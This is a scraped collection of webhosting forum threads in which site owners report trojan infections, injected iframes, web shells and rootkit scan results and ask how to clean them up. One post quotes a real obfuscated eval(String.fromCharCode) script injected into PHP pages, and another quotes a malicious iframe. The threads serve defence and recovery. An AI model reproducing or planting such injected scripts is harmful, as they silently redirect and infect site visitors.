Websites Infected With Trojan How To Solve?

Nov 16, 2008

i see my websites are infected with some trojan.

there are some iframe tag simlilar to this in all index files

<iframe src="http://traff<<removed>>.cn/in.cgi?27" width=100 height=80></iframe>
any idea how might this iframe inserted in my codes.

i have tried to format my systems and remove all saved ftp passwords , but still this virus is comming back and the strange thing is i have website on different servers infected with same virus
any idea how this is happened and how to avoide this?

View 9 Replies


ADVERTISEMENT

Infected Web Pages

Jun 10, 2009

150 php pages infected codes like.... As we do not have a backup..is there any commands to remove it

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>

Is there any command to search and replace this whole string from files...normal sed is not seems to be working with these symbols.

View 8 Replies View Related

My Server Infected

Oct 26, 2007

seem that my server is infected by this virus Exploit.HTML.IESlice.h
it insert iframe code to index page and forward visitors to another site.

my server is running centos 4.5 and WHM/Cpanel, which antivirus software i need to use or other methods to eliminate this virus?

View 1 Replies View Related

Bindshell INFECTED

Jan 15, 2007

Quote:

Searching for rootedoor... nothing found
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' file size is zero
nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found

Above is a part of chkrootkit report i receive everyday,today seem something is wrong as bindshell is INFECTED.Any suggestion what should i do in this case?

View 5 Replies View Related

All Index Files Got Infected

Jun 12, 2007

after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files

Code:
<iframe src=[url]

and when i delete this code it come again in all index files

i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again

View 14 Replies View Related

Checking `bindshell'... INFECTED (PORTS: 465)

Jul 29, 2007

I run CHKROOTKIT Scan and found that:

Checking `bindshell'... INFECTED (PORTS: 465)

View 2 Replies View Related

How To Solve The Following Error

Jan 12, 2007

I have a dedicated server and it works very well to all my sites and my scripts until 2 weeks ago, I start getting errors from my sites the following error message php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution

I thought this is a temporary error only when I first encounter it, but its been 2 weeks now and still the problem is continuesly showing.

The problem cause my 2 sites being penalized from google search engine because of this problem.

View 6 Replies View Related

Hacked By Aftehner How To Solve It

Apr 23, 2007

My server have been hacked by a user that have the nick of aftehner

excatly what he does is enter and execute a command by a php script that execute a command in shell that delete all the files that have in their name index or main, so he destruy alot of information.

My question is how can i reinstall everything in a remote server, I already try to reinstall cpanel, apache (but it doesnt work with the cpanel version so i try it to install a standalone but it only shows 1 page for all domains hosted)

I dont know what can i do, It delete alot of information and replace with a file of hacked by aftehner or something like that.

Yum is doesnt work correctly, i already try to reinstall python, perl, php, but i still having problems. I have been working all the day until 4 am for 3 days trying to fix it, I already know how he make the attack and i have all the log i can share this information with you for not have this problem.

What do you reccommend to do for solve this problem?

Server
Linux Fedora
Athlon XP 3800+
1 gb RAM
Data center: Layered tech
CPANEL / WHM

A domain hosted in it: Mindev.com
They hacked the website by the domain: Lodice.com

View 4 Replies View Related

How To Solve A Mail Attack

Aug 30, 2007

how it's possible to solve this problem: My domain name has an e-mail address that is being forged and used by a spammer, and I get an incredible amount of bounced emails to the point to bring down a Dual-Xeon with 4GB of RAM. This e-mail account has been discontinued and e-mail sent to non-existent accounts is set to be thrown away. The average server load goes through the roof in a few seconds as soon as I point the MX entries to the server. I don't have the money to set up a load-balanced system. What could I do to host this domain name and use e-mail, only allowing emails to existing email accounts?

View 14 Replies View Related

/usr Disk Space Is Running Out. How To Solve

Mar 5, 2008

My ISP gave me the box with /usr allocated only 8G, now is 6G used. I suppose that Cpanel will take space when I create email accounts, forwarders, maybe other stuff too.

What can I do to prevent running out of space?

View 5 Replies View Related

How To Solve Problems With Latest RPMs

Mar 12, 2007

I am trying to install some packages on my system and sometimes they depend on different, sometimes earlier, sometimes later versions of library packages on my system.

In that situation is it better to get the source for the package and recompile it with what you have on your system?

I am assuming that the dependent libraries the packages where compiled with were what was available on the package developer's system and do not necessarily contain new features lacking in the older versions.

Will recompling such packages from the source rpms fix the problems in most cases?

One particular group I persistently come across is the libcX.so libraries.

View 0 Replies View Related

Joomla Install - Solve Directory Permission

Jun 28, 2009

I installed Joomla today, and it went smoothly except that under Help -> System Info in the Joomla admin panel, all "Directory Permissions" are "Unwritable."

I've read up on various solutions, such as installing suphp to take care of user permissions. But if I have my own Linux VPS and I am the only user (i.e. noone else has accounts on my VPS), what is the easiest way to fix this issue? Can I just CHMOD those directories to 777 without worrying about causing a security issue? Or is there a similarly easy solution for someone like me with very basic Linux knowledge?

View 14 Replies View Related

Load Spikes Every Morning, Every 30 Minutes, Host Can't Solve

May 4, 2007

We've had a VPS for just over a month now. I am not going to mention the host by name (yet) but they advertise here and other people here reported liking them.

Sadly it's not my experience and I regret my purchase.

Every morning for the past few weeks, we get load spikes every 30 minutes that make our site unusable for a minute (on our VPS, any load over 1.0 is sluggish, over 2.0 is virtually unusable, over 3 is unresponsive)

Here's a series of days as an example:
[url]

The worst part about this is the host insists 1. either it's not happening or 2. they can't find it

I know it's happening because when I try to load a page on the half-hour, it takes over 13 seconds (less than 1 second normally). And it's fairly obvious it's someone doing a cron job with some nasty downloading, uploading, or maybe a massive mysql update.

Someone tell me what to tell them because this is driving me out of my mind. The load is NOT being caused by ourselves, I've made sure all our cron jobs don't happen on the exact half hour and we get lots of traffic later in the day without loads.

View 14 Replies View Related

Plesk 12.x / Linux :: Auto Updater - Failed To Solve Dependencies

Mar 27, 2015

Last night the plesk auto updater ran an update. And i was wondering if others have had the same issue?

CentOS6, RHEL5 x64 Plesk 12 Unlimited

Detecting installed product components.
Gathering information about installed license key...
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile

[Code] .....

ERROR: The Yum utility failed to install the required packages.
Attention! Your software might be inoperable.
Please, contact product technical support.Click to expand...

View 9 Replies View Related

LKM Trojan?

Aug 20, 2007

I just installed a fresh copy of centos 4.5, updated some programs and installed chkrootkit. When i run # ./chkproc, it shows the following output:

# ./chkproc
You have 14 process hidden for readdir command
You have 14 process hidden for ps command

Searching for LKM trojans shows the following output:
# ./chkrootkit -x lkm

EXE 9994: /usr/sbin/named
CWD 9995: /var/named
EXE 9995: /usr/sbin/named
CWD 9996: /var/named
EXE 9996: /usr/sbin/named
CWD 9997: /var/named
EXE 9997: /usr/sbin/named
CWD 9998: /var/named
EXE 9998: /usr/sbin/named
CWD 26293: /var/lib/mysql
EXE 26293: /usr/sbin/mysqld
CWD 26294: /var/lib/mysql
EXE 26294: /usr/sbin/mysqld
CWD 26295: /var/lib/mysql
EXE 26295: /usr/sbin/mysqld
CWD 26296: /var/lib/mysql
EXE 26296: /usr/sbin/mysqld
CWD 26297: /var/lib/mysql
EXE 26297: /usr/sbin/mysqld
CWD 26298: /var/lib/mysql
EXE 26298: /usr/sbin/mysqld
CWD 26299: /var/lib/mysql
EXE 26299: /usr/sbin/mysqld
CWD 26300: /var/lib/mysql
EXE 26300: /usr/sbin/mysqld

When i stop mysql and named, and run # ./chkrootkit -x lkm again, it doesn't show anything. When i turn mysql and named back on, it starts complaining about compromises again.

Can it be a false alarm, or should i really be worried? What do you advise me to do now?

View 9 Replies View Related

Trojan C99Shell

Jul 1, 2009

I just installed zen cart on my webhosting and after few days later i saw some file written like core1405.php and when i open to view the file it is actually trojan c99shell.

I have deleted all of the core file. Now how can i prevent it from happen again? Cause it is too much work to clean up the hosting server.

View 14 Replies View Related

What To Use To Scan For Trojan?

Jun 2, 2009

We have a client claming that she gets a Trojan warming when she trys to access her website but using the Trojan scan in cpanel doesn't show anything.

What can we use to scan for Trojan?

View 5 Replies View Related

15 POSSIBLE Trojan Detected WHM

Aug 3, 2007

i have an site on my server when i open it the kaspersky anti viruss detect there is an trojan in this site .. ( see the picture in the attachment )

and i checked the server from the whm and there is result 15 POSSIBLE Trojans Detected

How i can solve this ?? and remove this trojans .

View 14 Replies View Related

Trojan :: 687 POSSIBLE Trojans?

Mar 21, 2008

I just ran a scan for trojan horses in WHM and it came up with "687 POSSIBLE Trojans". WTH? Are these real trojan horses? If so, how do I remove them?

View 2 Replies View Related

PHP.Backdoor.Trojan

Apr 29, 2008

As usually I do monthly scan to all files on my site,today I download all backup site into my PC,then scanning them using Norton Antivirus and on one site files Norton detected PHP.Backdoor.Trojan.

I take a look file location and found current file with name xTgsj78Jn.txt

Then I go to my server where site hosted,and i go to the directory and found file above stay on there,I try many time to delete it but always get an error message "Permission denied",I try to change permission but always returned an error.

When deleted it i use command rm -r with root access,then I do ls -l and found details file like below.

-rwxrwxrwx 1 nobody nobody 137787 Mar 19 20:14 xTgsj78Jn.txt*

Please help me to delete this file.

FYI this file uploaded to my hosting file site.

View 14 Replies View Related

Trojan :: How To Clean Server?

Aug 7, 2007

my whm Trojan scanner found 23 possible Trojans.

how can i clean my server?

View 9 Replies View Related

Trojan-Downloader.JS.Psyme.hz

Aug 12, 2007

I have an hosting account at OXEO.com and I have trojan problems on all my websites

The index files of all my websites show a Trojan program called Trojan-Downloader.JS.Psyme.hz

I checked my websites on Google and Google is warning users for this kind of problems for one of my websites

Does anybody here has experienced the same problem?

View 1 Replies View Related

Possible Trojan List By WHM - Do I Need To Worry?

Nov 8, 2007

I ran the Trojan scan in WHM and it came up with the list below. I have a strong feeling WHM is mis-reporting these as trojans, but I thought I would ask the experts here:

Scan for Trojan Horses

Appears Clean

/dev/stderr

Scanning for Trojan Horses.....

Possible Trojan - /usr/bin/cpan
Possible Trojan - /usr/bin/instmodsh
Possible Trojan - /usr/bin/prove
Possible Trojan - /usr/bin/xmlcatalog
Possible Trojan - /usr/bin/xmllint
Possible Trojan - /usr/bin/xml2-config
Possible Trojan - /usr/lib/libxml2.la
Possible Trojan - /usr/bin/mysqlhotcopy
Possible Trojan - /usr/bin/Wand-config
Possible Trojan - /usr/bin/animate
Possible Trojan - /usr/bin/compare
Possible Trojan - /usr/bin/composite
Possible Trojan - /usr/bin/conjure
Possible Trojan - /usr/bin/convert
Possible Trojan - /usr/bin/display
Possible Trojan - /usr/bin/identify
Possible Trojan - /usr/bin/import
Possible Trojan - /usr/bin/mogrify
Possible Trojan - /usr/bin/montage
Possible Trojan - /usr/bin/curl-config
Possible Trojan - /usr/bin/curl
Possible Trojan - /usr/lib/libcurl.so.3.0.0
Possible Trojan - /usr/lib/python2.3/site-packages/libxml2mod.la
Possible Trojan - /usr/lib/python2.3/site-packages/libxml2mod.so
Possible Trojan - /usr/sbin/pureauth
25 POSSIBLE Trojans Detected

Is there anything that looks fishy here?

View 3 Replies View Related

How-to - Rootkit Scan (trojan Etc)

Jan 21, 2004

What is a rootkit? The following link is a very good read to answer that question.

http://linux.oreillynet.com/pub/a/li...4/rootkit.html

In Summary, a rootkit is a trojan installed on your Linux server after someone has broken into it. These files are used to cover the hackers tracks, and to give the hacker tools to do more dirty work from your server.

Usage:

1. su - (change to root user)
2. mkdir /usr/local/chkrootkit
3. wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
4. tar -xvzf chkrootkit.tar.gz
5. cd chkrootkit*
6. cp * /usr/local/chkrootkit
7. cd /usr/local/chkrootkit
8. make sense

Now scan your system:

1. cd /usr/local/chkrootkit
2. ./chkrootkit

chkrootkit may from time to time give false positives. If you ever get a positive or "infected hit" scan a second time. If you do get a positive hit, google the hit to research the issue and steps to correct.

Part 2 - automated chkrootkit, and emailed results.

I'm lazy, and like my server to do the work for me so I have it scan every day, and email me the results.

Usage:

1. vi /etc/cron.daily/chkrootkit
2. add the following code.

Code:
#!/bin/bash
(cd /usr/local/chkrootkit; ./chkrootkit -q 2>&1 | mail -s "Daily chkrootkt scan" you@yourdomain.com)
3. chmod 0755 /etc/cron.daily/chkrootkit

This will email you@yourdomain.com every morning with your chkrootkit results. the -q option will only show you exploits.

Removal:

If you don't like getting the emails or just want to remove this from your server:

1. rm /etc/cron.daily/chkrootkit
2. rm -rf /usr/local/chkrootkit

All files will now be deleted from your server.

View 14 Replies View Related

How To Remove Virus/Trojan

Dec 7, 2008

how can I remove a Virus/Trojan from my website?

View 6 Replies View Related

Trojan-Downloader.JS.Psyme.hz Remover

Aug 3, 2007

can any body help me with the Trojan-Downloader.JS.Psyme.hz remover?

i can't find an remover for linux server for this trojan.

View 4 Replies View Related

Trojan-Clicker.HTML.IFrame.amh

Nov 6, 2009

I am not that technically proficient so I have to resort to shared hosting solutions...I am currently with Bluehost.

Problem: I have a small site with minimal needs in terms of storage and bandwidth, but the site is controversial and gets hacked and attacked a lot.

I need a shared hosting provider which ranks higher than most in terms of security.

Recently the site was attacked such that any user going to the site was infected with Trojan horse viruses.

Donno if it's useful or not but here are the files from my PC antivirus which was infected when I went to the site with IE:


File generated by Rogers Online Protection Anti-Virus

C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5PG8E0SM0gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:25 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5GC9JZWI3gifimg[2].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:27 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5QBPA1ELgifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:27 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE56SLECSUQgifimg[5].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:28 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5EKTEAS82gifimg[5].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:28 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5P5098OY4gifimg[4].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:29 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5IPGNWAB0gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:30 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE55VT8B104gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:30 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE543XUDX83gifimg[2].htm Trojan-Clicker.HTML.IFrame.amh
Quarantined 11/5/2009 12:21:31 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE56SLECSUQgifimg[5].htm Trojan-Clicker.HTML.IFrame.amh
Quarantined 11/5/2009 12:22:18 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet

View 7 Replies View Related

Trojan-Clicker.HTML.Iframe.g In My Website? What Is This??

Sep 4, 2007

I have a website and all works fine, but an user said me that uses kaspersky said me my website has an trojan i don't understand how this is possible, and i'l really worried.

the trojan that appears to my user is:

Trojan-Clicker.HTML.Iframe.g

someone know why i have this trojan?

Now the users refuses to open my website!! i'm more than worried

this is an printscreen of the error: ...

View 14 Replies View Related

Trojan Detected On Initial Load Of Site

Jan 8, 2008

I have 2 reseller accounts with one provider, and in the last several days I have noticed that when you visit the site for the first time, my AV software detects a trojan on the site, but the code & html files are 100% clean!

I'm suspecting that there is something being injected into the scripts from the server daemons that's either running or something else.

Anyone have any suggestions?

View 14 Replies View Related

Prevent Of Execution Trojan Shell Scripts, Like R57shell And Other?

Oct 27, 2006

Which configuration for php and server that prevent execute shell scripts?

Which funstions you recommend to disable?

Like shell_exec, passthru, proc_open, proc_close, proc_get-status, proc_nice, proc_terminate, exec, system, suexec, popen, pclose, dl, ini_set, virtual, set_time_limit

View 14 Replies View Related

/tmp/clamav-77e7bfdbb2d3872b/test2.exe: Trojan.Taskkill.A FOUND

Jun 11, 2007

What is the mining of following lines in temp folder. If i have been check daily /tmp folder
many /tmp/clamav are presented in mail server, and occupied the large amount of space in temp folder

/tmp/clamav-77e7bfdbb2d3872b/test1.exe: Worm.Mydoom.U FOUND

/tmp/clamav-77e7bfdbb2d3872b/test2.exe: Trojan.Taskkill.A FOUND

/tmp/clamav-77e7bfdbb2d3872b/test3.exe: Worm.Nyxem.D FOUND

/tmp/malware.zip: Infected.Archive FOUND

View 1 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved